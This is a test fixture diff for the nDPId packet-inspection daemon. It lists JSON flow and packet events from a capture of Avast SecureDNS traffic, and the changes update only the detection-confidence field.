00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1625477700884,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625477700884,"pkt":"YDjgxTWgeJS0JASgCABFAADMuTUAADIRMnS11iOVwKgCZAG7++cAuDPPPVqBgAABAAEAAAAAATIJc0VjVXJFRE5zBUFWQXN0A0NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477702850,"flow_last_seen":1625477702850,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477702850,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1625477702850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625477702850,"pkt":"eJS0JASgYDjgxTWgCABFAABD4lMAAH8RvN7AqAJktdYjlcIoAbsAL9+b0x0BAAABAAAAAAAAATIJU0VDdXJFZG5TBUF2QXNUA2NvTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477702850,"flow_last_seen":1625477702850,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477702850,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477702850,"flow_last_seen":1625477702850,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477702850,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1625477702968,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625477702968,"pkt":"YDjgxTWgeJS0JASgCABFAADMurcAADERMfK11iOVwKgCZAG7wigAuFgK0x2BgAABAAEAAAAAATIJU0VDdXJFZG5TBUF2QXNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625413810414,"flow_last_seen":1625413810531,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625477702968,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625413810414,"flow_last_seen":1625413810531,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625477702968,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477738051,"flow_last_seen":1625477738051,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477738051,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1625477738051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625477738051,"pkt":"eJS0JASgYDjgxTWgCABFAABD1LsAAH8RynbAqAJktdYjldgPAbsAL4PhWDEBAAABAAAAAAAAATIJc2VjdXJFZE5TBWF2YVN0A2NPbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477738051,"flow_last_seen":1625477738051,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477738051,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477738051,"flow_last_seen":1625477738051,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477738051,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1625477738172,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625477738172,"pkt":"YDjgxTWgeJS0JASgCABFAADMCxkAADER4ZC11iOVwKgCZAG72A8AuPxPWDGBgAABAAEAAAAAATIJc2VjdXJFZE5TBWF2YVN0A2NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477739836,"flow_last_seen":1625477739836,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477739836,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1625477739836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625477739836,"pkt":"eJS0JASgYDjgxTWgCABFAABD1L8AAH8RynLAqAJktdYjldsvAbsAL1UmhCwBAAABAAAAAAAAATIJc0VjVXJlRG5TBWF2QVN0A2NPTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477739836,"flow_last_seen":1625477739836,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477739836,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625477739836,"flow_last_seen":1625477739836,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625477739836,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1625477739952,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625477739952,"pkt":"YDjgxTWgeJS0JASgCABFAADMDM8AADIR3tq11iOVwKgCZAG72y8AuM2UhCyBgAABAAEAAAAAATIJc0VjVXJlRG5TBWF2QVN0A2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":37,"packets-processed":36,"total-skipped-flows":0,"total-l4-payload-len":3870,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":18,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":18,"total-idle-flows":13,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":95,"global_ts_msec":1625482316411} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482316411,"flow_last_seen":1625482316411,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1625482316411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482316411,"pkt":"eJS0JASgYDjgxTWgCABFAABDyvUAAH8R1DzAqAJktdYjlfvuAbsAL4YFMq4BAAABAAAAAAAAATIJU2VDVVJFZE5zBWFWYXNUA0NvbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482316411,"flow_last_seen":1625482316411,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482316411,"flow_last_seen":1625482316411,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482316411,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1625482316532,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482316532,"pkt":"YDjgxTWgeJS0JASgCABFAADMlTUAADMRVXS11iOVwKgCZAG7++4AuP5zMq6BgAABAAEAAAAAATIJU2VDVVJFZE5zBWFWYXNUA0NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482318517,"flow_last_seen":1625482318517,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482318517,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1625482318517,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482318517,"pkt":"eJS0JASgYDjgxTWgCABFAABDyvkAAH8R1DjAqAJktdYjlcjXAbsALzxZb7EBAAABAAAAAAAAATIJU2VDdXJlRG5TBUFWQVN0A0NvbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482318517,"flow_last_seen":1625482318517,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482318517,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482318517,"flow_last_seen":1625482318517,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482318517,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1625482318634,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625482318634,"pkt":"YDjgxTWgeJS0JASgCABFAADMmQwAADIRUp211iOVwKgCZAG7yNcAuLTHb7GBgAABAAEAAAAAATIJU2VDdXJlRG5TBUFWQVN0A0NvbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477738051,"flow_last_seen":1625477738172,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477702850,"flow_last_seen":1625477702968,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477697370,"flow_last_seen":1625477697487,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477739836,"flow_last_seen":1625477739952,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477700767,"flow_last_seen":1625477700884,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477738051,"flow_last_seen":1625477738172,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55311,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477702850,"flow_last_seen":1625477702968,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49704,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477697370,"flow_last_seen":1625477697487,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":58155,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477739836,"flow_last_seen":1625477739952,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56111,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625477700767,"flow_last_seen":1625477700884,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625482318634,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64487,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482396199,"flow_last_seen":1625482396199,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625482396199,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1625482396199,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625482396199,"pkt":"eJS0JASgYDjgxTWgCABFAABD9goAAH8RqSfAqAJktdYjlfkgAbsALyRTl04BAAABAAAAAAAAATIJc0VDdVJlZG5TBUFWQVN0A0NPbQAAEAAB"} 